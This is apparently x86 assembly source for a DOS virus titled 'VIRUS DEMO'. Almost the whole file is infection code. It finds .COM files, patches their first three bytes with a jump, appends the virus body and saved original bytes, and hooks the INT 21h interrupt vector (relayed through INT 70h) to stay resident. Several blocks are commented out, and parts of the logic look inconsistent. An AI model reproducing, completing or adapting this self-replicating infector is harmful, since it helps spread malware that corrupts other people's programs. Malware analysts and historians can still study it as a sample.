
;*****************************************************************************
;           			 VIRUS  DEMO (the one that macafee found)
;-----------------------------------------------------------------------------

len	equ	01dch



;-----------------------------------------------------------------------------
;    				FIND FIRST FILE
;-----------------------------------------------------------------------------
jmp	con
cmp	ah,3dh
je	con
cmp	ah,0fh
je 	con
int	70h
iret

con:	push	ax
push	ds
push	dx


mov	ah,1ah
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
int	70h

mov	ah,4eh
mov	cx,0
mov	dx,cs
mov	ds,dx
mov	dx,offset fname
int	70h
jc	error1

;
;push	cs
;pop	ds
;mov	dx,offset buff
;mov	ah,9
;int	70h
;


;-----------------------------------------------------------------------------
;			FIND FILE SIZE
;-----------------------------------------------------------------------------


mov	ah,3dh
mov	al,2
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,30
int	70h
jc	error1
mov	fhandle,ax

mov	ah,42h
mov	al,2
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	70h
jc	error1

push	ax
;------------------------------------
;	close
;-----------------------------------
;mov	ah,3eh
;mov	bx,fhandle
;int	70h
;jc	error1

jmp	cont

;-----------------------------------------------------------------------------
;		NOT	FAR	ERROR
;-----------------------------------------------------------------------------

error1: mov	ah,4ch
	mov	al,1
	int	70h


;-----------------------------------------------------------------------------
;                PUT THE CALL INSTRUCTION CODE IN BUFF
;-----------------------------------------------------------------------------

cont:	sub ax,3	;find the disp for the jump code
mov	buff+1,al
mov	buff+2,ah
mov	ax,00e8h
mov	buff,al

;-----------------------------------------------------------------------------
;		READ THE 3 FIRST BYTES FROM THE FILE
;-----------------------------------------------------------------------------

mov	ah,42h
mov	al,0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	70h
jc	error1


mov	ah,3fh
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,3
mov	bx,fhandle
mov	cx,3
int	70h
jc	error1
cmp	ax,cx
jl	error1


;-----------------------------------------------------------------------------
;			MOVE 3 BYTES FROM BUFF+3 TO dat1-3
;-----------------------------------------------------------------------------

mov	al,buff+3
mov	dat1,al
mov	al,buff+4
mov	dat2,al
mov	al,buff+5
mov	dat3,al

;-----------------------------------------------------------------------------
; 		WRITE THE JMP INSTRUCTION TO THE DISK
;-----------------------------------------------------------------------------


mov	ah,42h
mov	al,0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	70h
jc	error1


mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
mov	bx,fhandle
mov	cx,3
int	70h
jc	error
cmp	ax,3
jne	error



;mov	ah,0fh
;mov	dx,cs
;mov	ds,dx
;mov	dx,offset myfcb
;int	70h
;or	al,al
;jnz	error1
;
;mov	dx,offset buff
;mov	ah,1ah
;int	70h
;
;mov	word ptr myfcb+0eh,3
;
;mov 	word ptr myfcb+21h,0
;mov	word ptr myfcb+23h,0
;
;mov	ah,22h
;mov	dx,offset myfcb
;int	70h
;or	al,al
;jnz	error1

;mov	ah,10h
;mov 	dx,offset myfcb
;int	70h
;or	al,al
;jnz	error

;-----------------------------------------------------------------------------
;	CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF
;-----------------------------------------------------------------------------

pop 	ax
add	ax,16bh
mov	sdat1,al
mov	sdat1+1,ah


;-----------------------------------------------------------------------------
;			CLEAR   FCB
;-----------------------------------------------------------------------------



;mov	cx,7
;mov	si,offset fname
;mov	di,offset fn
;mov	dx,cs
;mov	ds,dx
;mov	dx,cs
;mov	es,dx
;rep movsb



;-----------------------------------------------------------------------------
;			WRITE THE VIRUS PREFIX TO DISK
;-----------------------------------------------------------------------------

;mov	ah,3dh
;mov	al,2
;mov	dx,cs
;mov	ds,dx
;mov	dx,offset fn
;int	70h
;jc	error
;mov	fhandle,ax

mov	ah,42h
mov	al,2
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	70h
jc	error

mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,offset data
mov	bx,fhandle
mov	cx,006bh
int	70h
jc	error
cmp	ax,006bh
jne	error


;----------------------------------------------------------------------------
;
;----------------------------------------------------------------------------

mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,0100h
mov	bx,fhandle
mov	cx,len
int	70h
jc	error
cmp	ax,len
jne	error




;-----------------------------------------------------------------------------
;			CLOSE FILE
;-----------------------------------------------------------------------------

mov	ah,3eh
mov	bx,fhandle
int	70h
jc	error


;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;			WRITE THE VIRUS TO DISK
;-----------------------------------------------------------------------------
;jmp error
;mov	ah,15h
;mov	dx,cs
;mov	ds,dx
;mov	dx,offset myfcb
;
;mov	word ptr myfcb+0eh,len
;int	70h
;or	al,al
;jnz	error
;
;-----------------------------------------------------------------------------
;				CLOSE THE FILE
;-----------------------------------------------------------------------------
;
;mov	ah,10h
;mov	dx,cs
;mov	ds,dx
;mov	dx,offset myfcb
;int	70h
;or	al,al
;jnz	error

pop	dx
pop	ds
pop	ax

int	70h

iret




;*****************************************************************************
;  				DATA SECTION
;-----------------------------------------------------------------------------

error:	mov 	ah,4ch
	mov	al,1
	int	70h



buff	db	43 dup (0)
fname	db	"*.COM",0

fhandle dw	?


data	db	198,6,0,1
dat1	db	0
datb	db	198,6,1,1
dat2	db	0
datc	db	198,6,2,1
dat3	db	0


pop	bx	;change the call data to 100h
mov	bx,100h
push	bx


push	ax
push	ds
push	es



mov 	cx,len
source	db	190	;MOV SI,OFFSET SOURCE
sdat1	db	0,0
mov 	di,100h
mov	dx,cs
mov	ds,dx
mov	dx,9800h
mov	es,dx
rep movsb



;a	db	154,0,1,0,128	; CALL 9800:0100
;--------------------------------------------------------------------------
;		PUT INT 21H VECT. TO INT 70H
;--------------------------------------------------------------------------
push	ds
mov	ax,0
mov	ds,ax
push 	[84h]
pop     [1c0h]

push	[85h]
pop	[1c1h]

push	[86h]
pop	[1c2h]

push	[87h]
pop	[1c3h]

;------------------------------------------------------------------------
;		HOOK THE VIRUS TO INT 21
;------------------------------------------------------------------------


;push	[84h]	;IP
;push	[85h]	;IP
;push	[86h]	;CS
;push	[87h]	;CS

;mov	dx,9800h
;mov	ds,dx
; put the jump instruction at the end of virus
;mov	al,234
;mov     gen,al ;check if it`s 200h
;pop	al
;mov	gen+4,al
;pop	al
;mov	gen+3,al
;pop	al
;mov	gen+2,al
;pop	al
;mov	gen+1,al

; hook the virus
mov	dx,0
mov	ds,dx
mov	ax,100h
mov	[84h],ax
mov	ax,9800h
mov	[86h],ax
pop	ds

;-----------------------------------------------------------------------
;
;-----------------------------------------------------------------------
mov	ah,0fh
int	21h

pop es
pop ds
pop ax

ret
